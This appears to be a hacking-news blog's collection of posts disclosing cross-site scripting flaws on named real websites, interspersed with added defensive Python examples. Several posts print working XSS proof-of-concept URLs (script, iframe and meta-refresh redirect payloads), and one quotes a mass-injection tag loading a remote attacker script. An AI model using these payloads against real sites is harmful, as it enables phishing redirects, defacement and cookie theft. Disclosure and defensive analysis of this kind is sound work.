
Showing posts with label XSS Injection.

Time Now Tv & Shiksha Official Websites Vulnerable To XSS Security Flaw

A 21-year-old information security expert, Narendra Bhati (R00t Sh3ll The Untracable) from Sheoganj, Rajasthan, who was recently acknowledged by Acquia.com and has also found many persistent XSS flaws and one SQL injection in a bank website, has discovered non-persistent XSS security flaws in the official websites of Shiksha.com, Times Of India, and News Bullet, a sub-domain of the Start News channel.

Narendra says: "Kailash Bhayya, Ravi Sir & Sabari Sir, this is for you :-)"

Shiksha.com is part of the naukri.com group, India's No. 1 job portal. Other portals owned by its parent company, Info Edge, are 99acres.com, JeevanSathi.com, Brijj.com and AskNaukri.com.

TIMES NOW (timesnow.tv) is a leading 24-hour English news channel that gives urbane viewers the complete picture of the news that is relevant, presented in a vivid and insightful manner that enables them to widen their horizons and stay ahead.

In all these websites, the search fields were found to be vulnerable to XSS injection.

PoC code for Times Of India TV:
http://www.timesnow.tv/videosearchresult.cms?query="/><iframe+src="http://www.breakthesecurity.com"+width="1000px"+height="1000px"></iframe>&srchcombo=1&x=0&y=0

PoC for Shiksha.com:
http://www.shiksha.com/search/index?keyword="/><iframe+src="http://www.breakthesecurity.com"+width=1000+height=1000></iframe>&start=0&institute_rows=-1&content_rows=-1&country_id=&city_id=&zone_id=&locality_id=&course_level=&course_type=&min_duration=&max_duration=&search_type=&search_data_type=&sort_type=&utm_campaign=site_search&utm_medium=internal&utm_source=shiksha&from_page=homepage&autosuggestor_suggestion_shown=5
Narendra also found that shiksha.com is vulnerable to CSRF, which allows an attacker to change the mobile number of a victim through a malicious web page.

Narendra also claimed that he tried hard to contact all of these websites by email, Facebook page, etc., but they did not reply to him for one month. After this he decided to disclose the vulnerabilities and reported them to EHN.

Shane Warne Official Website Vulnerable to XSS Security flaw

A 21-year-old information security expert, Narendra Bhati from Sheogan, Rajasthan, who recently found non-persistent XSS in Brother Soft, Aircel and MTS Mobile and a SQL injection in a bank website, has discovered a non-persistent XSS security flaw in the official website of Shane Warne.

Narendra wants to say: “Maa, Papa And Bhayya One Day I Will Make You Proud On Me”

Narendra found that the search query field on the www.shanewarne.com webpage is vulnerable to XSS attack.

Shane’s world-class talents have been recognized through a number of distinguished awards, including being named one of only five Wisden’s Cricketers of the 20th Century, in Australia’s Cricket Team of the 20th Century, BBC Sports Personality of the Year in 2005, and Victoria’s Greatest Ever Sportsman in 2002. In 2011 Shane was honored with the unveiling of a bronze statue of him at the Melbourne Cricket Ground, and in early 2012 he was inducted into the Australian Cricket Hall of Fame.

When an attacker visits "www.shanewarne.com" and enters the XSS code in the field, the site executes the entered script.

PoC code:

http://www.shanewarne.com/search/content?q=<script>alert("E+Hacking+News")</script>

The site also allows users to inject iframe code:
http://www.shanewarne.com/search/content?q="/><iframe+src="http://www.ehackingnews.com"+width=1000+height=1000></iframe>


Narendra also succeeded in redirecting the Shane Warne website to another website. Five seconds after the page loads, it redirects to the website given in the input. So it is easy for an attacker to redirect innocent users to a phishing site or another website and steal their credentials. ;-)

PoC code:

http://www.shanewarne.com/search/content?q=<meta+http-equiv="refresh"+content="2;url=http://www.google.com/">

SourceForge vulnerable to XSS injection

A security researcher, WilyXem from Spain, has discovered a reflected cross-site scripting vulnerability in SourceForge (sourceforge.net).

SourceForge is a web-based source code repository. It acts as a centralized location for software developers to control and manage free and open source software development.

The vulnerability exists in the job-finding page of SourceForge. The developer fails to validate input coming from the text box that allows users to search for jobs.

This left the text field vulnerable to attack.

The PoC code:
sourceforge.net/jobs?age=1&text=1%22%3E%3Cscript%3Ealert%28%22WilyXem%20==%20UnderC0de.org%22%29%3C/script%3E&zip=10003&submit=Search
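The Times Now, Shiksha, Shane Warne and SourceForge findings above share one defect: a search term is copied straight back into the result page, so a `"` ends the attribute it lands in and a `<` opens whatever tag follows. The script below is an added example and not code from any of these sites or posts; the template, the `cricket` term and the `example.invalid` host names are constructed. It decodes a PoC-shaped URL the way a server would, renders the term once without encoding and once with context-appropriate HTML encoding, and counts whether the term managed to add markup.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed search terms shaped like the query strings quoted in the posts
# above (attribute breakout, script tag, meta refresh). Test inputs only;
# the host names are placeholders.
SAMPLE_QUERIES = [
    "cricket",  # benign
    '"/><iframe src="http://example.invalid" width=1000 height=1000></iframe>',
    '<script>alert("E Hacking News")</script>',
    '<meta http-equiv="refresh" content="2;url=http://example.invalid/">',
]


def extract_search_term(url: str, param: str) -> str:
    """Pull one query parameter out of a URL the way a server does.
    Percent-decoding and '+'-to-space happen here, so the encoded PoC
    strings are raw markup by the time they reach the template."""
    values = parse_qs(urlsplit(url).query).get(param, [""])
    return values[0]


def render_vulnerable(term: str) -> str:
    """Reflect the term with no encoding. This is the defect behind the
    search-field findings: the term lands inside an attribute value and
    inside element text, so a '"' closes the attribute and a '<' opens
    a new tag of the attacker's choosing."""
    return (
        f'<input type="text" name="q" value="{term}"/>\n'
        f"<h2>Results for {term}</h2>"
    )


def render_hardened(term: str) -> str:
    """Same template, with the term encoded for the context it lands in.
    html.escape(quote=True) turns & < > " ' into entities, so the value
    cannot terminate the attribute and the heading cannot grow a tag.
    Quote escaping matters: escaping only < and > would still let a '"'
    break out of value="..." (the "/> payloads rely on exactly that)."""
    for_attr = html.escape(term, quote=True)
    for_text = html.escape(term, quote=False)
    return (
        f'<input type="text" name="q" value="{for_attr}"/>\n'
        f"<h2>Results for {for_text}</h2>"
    )


TEMPLATE_TAG_COUNT = 3  # <input/>, <h2>, </h2> are the template's own tags


def introduces_markup(page: str) -> bool:
    """Demo check: any '<' beyond the template's own three came from the
    search term, i.e. the input was able to inject markup."""
    return page.count("<") > TEMPLATE_TAG_COUNT


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(
            f"{q[:40]!r:44} vulnerable={introduces_markup(render_vulnerable(q))} "
            f"hardened={introduces_markup(render_hardened(q))}"
        )
```

Encoding the output is the fix the posts are asking these sites for; input validation on a free-text search box cannot reject every string that is dangerous in HTML, but encoding at the point where the string is written into the page makes the context the decider, not the attacker.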

Over One million Pages infected by lilupophilupop.com SQL injection

Last year (yes, last year) on Dec 1st, ISC reported on the lilupophilupop.com SQL injection attack (combined with an XSS technique). When they first reported it, the number of infected pages was 80. Later, in the middle of the month, it rose to 160,000. At the end of the month (now), the count of infected pages has crossed one million.

These sites are infected by injecting the following script:
"></title><script src="http://lilupophilupop.com/sl.php"></script>

According to their report, the infected domains are distributed as follows:

  • NL - 123,000
  • FR - 68,100
  • UK - 56,300
  • DE - 49,700
  • RU - 32,000
  • DK - 31,000
  • COM - 30,500
  • JP - 23,200
  • CA - 16,600
  • ORG - 2,690
  • CN - 505

After researching the log records of the infected sites, it appears that the attackers probe vulnerable sites daily from different IP addresses.

"I put some things you might look for in the comments section of the diary. The easiest place to start will be to look for the 500 error messages, mainly because the final injection is likely to cause your DB product to throw an error which will show as a 500 error. Even if it does not, you may be able to identify the probing queries and from those identify the final injection.

When looking at fixing the problem do not forget that this vulnerability is a coding issue. You may need to make application changes. To address the issue make sure you perform proper input validation for every parameter you accept," said the first report.


Check whether your sites are infected by this attack:
To check whether your site is infected by the attack, search in Google for:
"></title><script src="hXXp://lilupophilupop.com/sl.php"></script> site:your_site.com

Replace "your_site.com" with your site's URL.
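The ISC advice quoted above (start from the 500 errors, then work back to the probing queries) and the Google check that follows it are both things a site owner can do from their own data. The script below is an added example, not from the ISC diary or this post: it triages constructed common-log-format lines (the addresses, paths and query strings are invented, and the probing markers are generic SQL-injection shapes rather than this campaign's payload), lists the client addresses behind the probes, and scans a saved page body for the injected tag quoted in the post.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in common log format. Addresses, paths and
# query strings are invented; the probing shapes are generic, not the
# campaign's actual payload.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Dec/2011:03:12:01 +0000] "GET /product.asp?id=42 HTTP/1.1" 200 5120
203.0.113.10 - - [01/Dec/2011:03:12:03 +0000] "GET /product.asp?id=42' HTTP/1.1" 500 1203
203.0.113.10 - - [01/Dec/2011:03:12:05 +0000] "GET /product.asp?id=42%20and%201%3D1 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Dec/2011:03:12:09 +0000] "GET /product.asp?id=42%20union%20select%201 HTTP/1.1" 500 1203
198.51.100.7 - - [01/Dec/2011:03:15:00 +0000] "GET /index.asp HTTP/1.1" 200 8800
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Heuristic markers for probing queries, matched against the decoded,
# lower-cased query string. These are examples; tune them to your application.
PROBE_MARKERS = ("'", " and 1=1", " or 1=1", "declare ", "cast(", "exec(", "union select")


def triage(log_text: str):
    """Split log entries into (errors, probes): entries that produced a 500,
    and entries whose decoded query string looks like SQL probing. The ISC
    advice is to start from the 500s and work back to the probing requests."""
    errors, probes = [], []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = m.groupdict()
        # Decode before matching: the attacker encodes, the database does not.
        entry["decoded"] = unquote_plus(entry["path"])
        query = entry["decoded"].partition("?")[2].lower()
        if entry["status"] == "500":
            errors.append(entry)
        if query and any(marker in query for marker in PROBE_MARKERS):
            probes.append(entry)
    return errors, probes


def probing_sources(log_text: str):
    """Distinct client addresses behind the probing requests, sorted."""
    _, probes = triage(log_text)
    return sorted({e["ip"] for e in probes})


# The injected tag quoted in the post. Use it to scan saved copies of your
# own pages, which is what the Google search in the post does from outside.
INJECTED_TAG = '"></title><script src="http://lilupophilupop.com/sl.php"></script>'

# Constructed page bodies for the demo.
SAMPLE_INFECTED_PAGE = (
    '<html><head><title>Widgets"></title>'
    '<script src="http://lilupophilupop.com/sl.php"></script></title>'
    "</head><body>...</body></html>"
)
SAMPLE_CLEAN_PAGE = "<html><head><title>Widgets</title></head><body>...</body></html>"


def count_injections(page_html: str) -> int:
    """Number of times the injected tag appears in a page body."""
    return page_html.count(INJECTED_TAG)


if __name__ == "__main__":
    errors, probes = triage(SAMPLE_LOG)
    print(f"500s: {len(errors)}, probes: {len(probes)}, sources: {probing_sources(SAMPLE_LOG)}")
    print(f"injected tags in sample page: {count_injections(SAMPLE_INFECTED_PAGE)}")
```

A hit from `count_injections` tells you which pages carry the tag; the log triage tells you which parameter the injection arrived through, which is the thing that actually has to be fixed, as the quoted report says.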

XSS Vulnerability in US Department of Health Human Services website

An INTRA team member, Jackeh, discovered a non-persistent XSS (cross-site scripting) vulnerability in the Disaster Information Management Research Center website.

Vulnerability Details:
Type: XSS (Non-Persistent)
Target URL: phpreparedness.nlm.nih.gov
Vulnerable Link: here

Skype for iPhone and iPod vulnerable to XSS ~Attacker able to steal data

A security researcher, Phil, discovered an XSS (cross-site scripting) vulnerability in Skype v3.0.1 and earlier versions for iPhone and iPod touch devices.

Skype uses a locally stored HTML file to display chat messages from other Skype users, but it fails to properly encode the incoming user's "Full Name", allowing an attacker to craft malicious JavaScript code that runs when the victim views the message.


Executing arbitrary JavaScript code is one thing, but he found that Skype also improperly defines the URI scheme used by the built-in WebKit browser for Skype. Usually you will see the scheme set to something like "about:blank" or "skype-randomtoken", but in this case it is actually set to "file://". This gives an attacker access to the user's file system: an attacker can access any file that the application itself would be able to access.

File system access is partially mitigated by the iOS application sandbox that Apple has implemented, which prevents an attacker from accessing certain sensitive files. However, every iOS application has access to the user's AddressBook, and Skype is no exception. He created a proof-of-concept injection and attack that shows that a user's AddressBook can indeed be stolen from an iPhone or iPod touch with this vulnerability.

Video Demo:

Kaskus - The Largest Indonesian Community Hacked using XSS vulnerability

Kaskus.us, the largest Indonesian community, is vulnerable to XSS, as discovered by Cyber4rt.

Vulnerability Information:
Type: XSS
Vulnerability Link: here
Status: Unfixed
Persistent Type: Non-Persistent

A few days back, Cyber4rt discovered an XSS vulnerability in Games.com.

Adobe Groups Profile Hacked using XSS(cross site Scripting)~Unfixed

Adobe still hasn't fixed the XSS vulnerability in Adobe Groups profiles. One more Adobe Groups profile has been created with XSS injection by the hacker Sony.

Check this:
http://bikaner.groups.adobe.com/index.cfm?event=post.display&postid=38442

One more Link:
http://bikaner.groups.adobe.com/index.cfm?event=post.display&postid=38443


Adobe Labs vulnerable to XSS(Cross site Scripting) ,found by @codeinesec

A hacker named codeine (INTRA team member) discovered an XSS (cross-site scripting) vulnerability in Adobe Labs. This XSS vulnerability may result in cookie stealing, so Adobe must fix it.

Vulnerability:
http://labs.adobe.com/technologies/spry/samples/rating/SpryRating.php?spry_dynamic=<script>alert(String.fromCharCode(67, 111, 100, 101, 105, 110, 101, 88, 115, 115))</script>

Yesterday, a hacker named Sony discovered a persistent XSS vulnerability in Adobe Profile.

Adobe Groups Profile Hacked using XSS(cross site Scripting) by Sony

A hacker known as Sony hacked an Adobe Groups profile using an XSS (cross-site scripting) vulnerability. The XSS is of the persistent type, meaning "if you insert files, it will be there permanently. It will be shown to all users". So hackers are able to steal cookies using it.
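Both this post and the Adobe Labs one above end on the same consequence: script that runs in the page can read the visitor's cookies. The script below is an added example, not from these posts or from Adobe; the `Set-Cookie` headers in it are constructed. It parses each header, reports which hardening attributes a cookie lacks, and lists the cookies that injected JavaScript could read through `document.cookie`, which is exactly the set a stored XSS payload would be able to carry off. Marking the session cookie `HttpOnly` limits the damage of an XSS that is already present; it does not remove the XSS, which still needs the output-encoding fix.

```python
# Constructed Set-Cookie headers for the demo; names and values are made up.
WEAK_SESSION = "session=7f3a9c; Path=/"
HARDENED_SESSION = "session=7f3a9c; Path=/; Secure; HttpOnly; SameSite=Lax"
UI_PREF = "theme=dark; Path=/; SameSite=Lax"


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie header into name, value and lower-cased attributes.
    Flag attributes (Secure, HttpOnly) map to True; valued ones keep their value."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value, "attrs": attrs}


def audit_cookie(header: str) -> list:
    """Return the hardening attributes a cookie lacks. For a session cookie,
    missing HttpOnly is the one that turns a stored XSS into cookie theft:
    script injected into the page can read the cookie via document.cookie.
    Secure keeps it off plaintext HTTP; SameSite limits cross-site sending."""
    attrs = parse_set_cookie(header)["attrs"]
    findings = []
    if "httponly" not in attrs:
        findings.append("HttpOnly")
    if "secure" not in attrs:
        findings.append("Secure")
    if "samesite" not in attrs:
        findings.append("SameSite")
    return findings


def readable_by_script(headers) -> list:
    """Names of the cookies that page JavaScript could read, in order:
    every cookie set without HttpOnly. This is what an XSS payload gets."""
    exposed = []
    for header in headers:
        cookie = parse_set_cookie(header)
        if "httponly" not in cookie["attrs"]:
            exposed.append(cookie["name"])
    return exposed


if __name__ == "__main__":
    for header in (WEAK_SESSION, HARDENED_SESSION, UI_PREF):
        print(f"{parse_set_cookie(header)['name']:8} missing: {audit_cookie(header) or 'nothing'}")
    print("readable by script:", readable_by_script([WEAK_SESSION, HARDENED_SESSION, UI_PREF]))
```

Run it against the `Set-Cookie` headers a site actually returns (for example from a captured response) to see which cookies a persistent XSS on that site would hand to an attacker; a non-sensitive preference cookie without `HttpOnly` is fine, a session cookie without it is not.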

Vulnerability Information:
  • Vulnerability Type: XSS
  • Persistent: Yes
  • Status: Unfixed
  • Hacked By: Hacker named "Sony"
  • Defacement: Defaced the profile page, not the main page
Proof of Vulnerability:


GAMES.COM is vulnerable to XSS ( Cross Site Scripting) ,discovered by Cyber4rt

A famous gaming website, "www.games.com", is vulnerable to XSS (cross-site scripting), as discovered by Cyber4rt. The search function is vulnerable to XSS.

Vulnerability Information:
  • Vulnerability: XSS
  • Discovered By: Cyber4rt
  • Website: www.games.com
  • Status: Unfixed

Proof of vulnerability:


Juan Sacco (runlvl) exposed XSS vulnerability in Bing.com Maps

Juan Sacco (runlvl), a security researcher at Insecurity Research Labs, exposed an XSS vulnerability in the Bing.com search engine.

BING.COM is prone to an XSS vulnerability because the application fails to properly perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code in the victim's browser.

Details
The reflected XSS vulnerability is a variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is executed by the browser, and then displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is online message boards where users are allowed to post HTML-formatted messages for other users to read.

Vulnerability Details:
  • Name : XSS Reflected on BING.COM
  • Vulnerability Type : XSS Reflected
  • Severity : Very High
  • Researcher : Juan Sacco (runlvl)
  • Vulnerable Link: here

The vulnerability is caused by the following code and affects the map's Generate Code feature:

<div id="LME_mapLinks" style="line-height: 20px">
<a id="LME_largerMap" //--&gt;&quot;&gt;'&gt; on Bing Maps (New
window)">View Larger Map</a>
</div>

Credits
Manually discovered by Insecurity Research Labs
Juan Sacco (runlvl) - http://www.insecurityresearch.com

XSS Injection Vulnerability found in Forbes.com

Forbes, one of the leading news companies, is vulnerable. A hacker with the name "B1uB3rry" exposed that Forbes.com is possibly vulnerable to SQL injection and confirmed to be vulnerable to cross-site script injection (XSS) and HTML injection. According to the hacker, "One can easily deface the website as other vulnerabilities exist." Live example of XSS injection on Forbes. The hacker is admin of the B1uB3rry Security Team (San Antonio, TX).

Vulnerable Link